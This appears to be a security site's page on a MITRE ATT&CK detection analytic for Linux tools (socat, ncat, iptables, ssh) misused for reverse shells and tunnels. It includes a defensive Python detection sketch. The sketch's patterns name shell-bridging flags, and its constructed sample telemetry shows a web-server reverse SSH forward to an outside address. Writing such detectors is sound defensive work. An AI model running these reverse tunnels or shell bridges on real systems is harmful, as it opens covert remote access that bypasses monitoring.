AN1230: Analytic 1230
User-space tools (e.g., `socat`, `ncat`, `iptables`, `ssh`) used in non-standard ways to establish reverse shells, port-forwarding, or inter-host connections. Often chained with uncommon outbound destinations or SSH tunnels.
Analyst context for executives and security teams
This analytic is about spotting Linux user-space tools such as socat, ncat, iptables, and ssh when they are used in unusual ways to create reverse shells, port forwarding, SSH tunnels, or unexpected host-to-host connections. For leaders, the value is not the tool names themselves—many are legitimate—but whether the organization can distinguish approved administration from covert connectivity that may bypass normal access paths and monitoring.
Executive priority
Prioritize this as a visibility and control-validation issue for Linux environments. It can affect incident response speed and business continuity because unauthorized tunnels or reverse connections may hide remote access paths, complicate containment, and weaken evidence for audits or investigations. Executives should ask whether Linux egress, administrative tooling, and SSH tunnel usage are governed, logged, and reviewable—not just whether the tools are installed.
Technical view
SOC and detection teams should validate Linux telemetry for command execution and network connection evidence involving user-space networking tools used in non-standard ways. Because ATT&CK provides no official detection logic or tactic mapping for this analytic, local baselining is essential: identify expected use of socat, ncat, iptables, ssh, port forwarding, and outbound SSH tunneling, then alert on deviations such as uncommon outbound destinations, unusual parent processes, unexpected inter-host paths, or tunnel-like activity from systems that do not normally perform administration or relay functions.
Likely telemetry
- Linux process creation and command-line arguments
- Parent/child process relationships for networking and shell-related utilities
- Outbound network connection logs from Linux hosts
- SSH session and tunnel-related logs where available
- Firewall, host firewall, or iptables configuration/change logs
Detection direction
- Build detections around behavior and context rather than tool presence alone, since socat, ncat, iptables, and ssh can be legitimate administrative tools.
- Baseline approved Linux administrative workflows, expected destinations, and systems authorized to create tunnels or port-forwarding connections.
- Tune for uncommon outbound destinations, unexpected inter-host connections, and SSH tunnel-like behavior, especially from servers or users without an administrative reason.
- Correlate process execution with network telemetry; command-line evidence alone may miss activity, while network-only evidence may lack intent.
- Review false positives from troubleshooting, DevOps, maintenance, and sanctioned remote access activity.
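As an added example that is not part of the ATT&CK analytic or of this page, the Python sketch below shows what "behavior plus context" looks like in practice: it takes constructed Linux process-creation and outbound-connection events, checks whether a networking tool was invoked with tunnel, relay or NAT-style arguments, and then scores each hit against an assumed baseline (hosts authorized to tunnel, admin users, expected parent processes, approved destinations). All host names, users, PIDs, destinations and baseline sets are constructed assumptions.

```python
"""Baseline-aware detection over constructed Linux telemetry (illustrative only)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    ts: str
    host: str
    pid: int
    user: str
    parent: str   # image name of the parent process
    image: str    # full path of the executed binary
    cmdline: str


@dataclass(frozen=True)
class NetEvent:
    ts: str
    host: str
    pid: int
    dest_ip: str
    dest_port: int


# Assumed environment baseline (constructed for this example, tune per site).
BASELINE: Dict[str, set] = {
    "tunnel_hosts": {"bastion01", "relay01"},       # may run ssh -L/-R/-D or socat relays
    "firewall_admin_hosts": {"bastion01"},          # may change iptables rules
    "approved_destinations": {"10.0.0.5", "10.0.0.6"},
    "admin_users": {"ops", "root"},
    "admin_parents": {"bash", "sudo", "systemd", "ansible"},
}

# Argument shapes that turn an ordinary tool into a tunnel, relay or command bridge.
# Plain "ssh user@host" or "iptables -L" does not match and is ignored.
TOOL_PATTERNS = {
    "ssh": re.compile(r"(?:^|\s)-[A-Za-z]*[RLDWw]"),
    "socat": re.compile(
        r"\b(?:TCP|UDP|OPENSSL|SSL)[46]?(?:-LISTEN|-L|-CONNECT)?:|\b(?:EXEC|SYSTEM):", re.I),
    "ncat": re.compile(r"(?:^|\s)(?:-e|-c|--exec|--sh-exec|--proxy)\b"),
    "iptables": re.compile(r"(?:^|\s)-t\s+nat\b|(?:^|\s)-[AI]\s+\S+"),
}
TOOL_ALIASES = {"nc": "ncat", "iptables-legacy": "iptables"}


def _tool_name(image: str) -> str:
    name = image.rsplit("/", 1)[-1]
    return TOOL_ALIASES.get(name, name)


def _dest_for(ev: ProcEvent, net_events: List[NetEvent]) -> Optional[NetEvent]:
    # Correlate on (host, pid); a real pipeline would also bound the time window.
    for n in net_events:
        if n.host == ev.host and n.pid == ev.pid:
            return n
    return None


def evaluate(proc_events: List[ProcEvent], net_events: List[NetEvent],
             baseline: Dict[str, set] = BASELINE) -> List[dict]:
    """Return findings (highest context score first); baseline-conformant use yields none."""
    findings = []
    for ev in proc_events:
        tool = _tool_name(ev.image)
        pattern = TOOL_PATTERNS.get(tool)
        if pattern is None or not pattern.search(ev.cmdline):
            continue
        reasons = []
        allowed = baseline["firewall_admin_hosts"] if tool == "iptables" else baseline["tunnel_hosts"]
        if ev.host not in allowed:
            reasons.append(f"{ev.host} is not authorized to run {tool} in tunnel/relay/NAT mode")
        if ev.user not in baseline["admin_users"]:
            reasons.append(f"non-administrative user {ev.user}")
        if ev.parent not in baseline["admin_parents"]:
            reasons.append(f"unusual parent process {ev.parent}")
        net = _dest_for(ev, net_events)
        if net is not None and net.dest_ip not in baseline["approved_destinations"]:
            reasons.append(f"uncommon outbound destination {net.dest_ip}:{net.dest_port}")
        if reasons:
            findings.append({"host": ev.host, "pid": ev.pid, "tool": tool,
                             "cmdline": ev.cmdline, "reasons": reasons, "score": len(reasons)})
    findings.sort(key=lambda f: f["score"], reverse=True)
    return findings


# Constructed sample telemetry: one unauthorized remote forward from a web server,
# one NAT change on a database host, and three baseline-conformant events.
PROC_EVENTS = [
    ProcEvent("t1", "web01", 4101, "www-data", "php-fpm", "/usr/bin/ssh",
              "ssh -fNR 2222:127.0.0.1:22 svc@203.0.113.77"),
    ProcEvent("t2", "bastion01", 2200, "ops", "bash", "/usr/bin/ssh",
              "ssh -L 5432:db01:5432 ops@10.0.0.5"),
    ProcEvent("t3", "db01", 3300, "root", "bash", "/usr/sbin/iptables",
              "iptables -t nat -A PREROUTING -p tcp --dport 3306 -j REDIRECT --to-ports 3307"),
    ProcEvent("t4", "bastion01", 2201, "ops", "bash", "/usr/bin/ssh", "ssh ops@10.0.0.6"),
    ProcEvent("t5", "relay01", 5100, "ops", "systemd", "/usr/bin/socat",
              "socat TCP-LISTEN:8443,fork,reuseaddr TCP:10.0.0.6:443"),
]
NET_EVENTS = [
    NetEvent("t1", "web01", 4101, "203.0.113.77", 22),
    NetEvent("t2", "bastion01", 2200, "10.0.0.5", 22),
    NetEvent("t5", "relay01", 5100, "10.0.0.6", 443),
]

if __name__ == "__main__":
    for f in evaluate(PROC_EVENTS, NET_EVENTS):
        print(f"[{f['score']}] {f['host']} pid={f['pid']} {f['tool']}: {f['cmdline']}")
        for r in f["reasons"]:
            print("   -", r)
```

The bastion and relay events produce no finding even though they use the same flags, which is the point of the baseline step: the detection fires on who, where and to what, not on the tool name. The score is simply the number of independent context deviations, so a single deviation (the iptables change on db01) surfaces at low priority for review rather than being dropped.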
Mitigation priorities
- Define and document approved use cases for Linux networking tools and SSH tunneling.
- Restrict or monitor outbound connectivity from Linux systems according to asset role and business need.
- Limit administrative access and privileges needed to create tunnels, modify iptables, or run non-standard networking utilities.
- Ensure Linux endpoint, SSH, and network telemetry are retained long enough to support investigation.
- Use detection testing or purple-team validation to confirm that non-standard tool usage produces observable evidence in the SOC workflow.
Analyst notes and limits
This object is a detection analytic for Linux and describes user-space tools used in non-standard ways for reverse shells, port forwarding, or inter-host connections. There are no supplied relationships, tactic mappings, aliases, labels, or official detection logic, so the practical guidance should be treated as validation direction rather than a complete analytic specification.
The supplied ATT&CK fields do not provide detection pseudocode, data components, tactics, related techniques, threat actors, campaigns, or mitigations. Environment-specific baselines, approved administration patterns, and available Linux/network telemetry are required before determining coverage or priority.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 7b58a348c909… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] mitre-attack: AN1230 (source URL)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.